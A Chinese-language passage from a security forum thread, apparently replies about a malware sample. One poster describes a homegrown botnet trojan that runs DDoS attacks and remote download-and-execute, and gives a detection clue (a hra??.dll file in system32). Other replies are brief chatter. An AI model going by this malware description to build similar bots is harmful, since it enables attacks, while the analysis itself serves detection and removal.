最近我也在关注这个病毒,加上你这个样本我已经收集3个不同的版本了,通过分析,这应该是个有具体团队或者个人持续更新的国产傀儡网络木马病毒,主要功能是对指定目标进行DDOS攻击,当然也有远程下载并运行的功能。3个版本拥有同样的dropper和字串加密解密算法(但key值有变化),程序稍有更新,最原始的版本甚至完全没有加壳。顺便在你的查杀方法上补充一下,这个病毒会在%system32%里生成hra??.dll(??代表2个随机数字)。有兴趣可以跟我继续交流。

ps:头像变漂亮了啊,呵呵
雪    币: 113
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
jimdlf 活跃值 2012-3-30 10:15
5
0
请查看一下你的临时文件夹 好像里面也有的。。。。。
雪    币: 755
活跃值: 活跃值 (39)
能力值: ( LV12,RANK:310 )
在线值:
发帖
回帖
粉丝
古河 活跃值 6 2012-3-30 10:21
6
0
顶一下CG图,看画风是樋上いたる 吧,是LittleBuster里的吗,怎么没印象
雪    币: 473
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
comewisdom 活跃值 2012-9-6 16:33
7
0
来围观一下吧..
雪    币: 148
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
chunbeishen 活跃值 2013-4-3 00:19
8
0
lpk风靡了一阵子
现在风光不再了~
游客
登录 | 注册 方可回帖
返回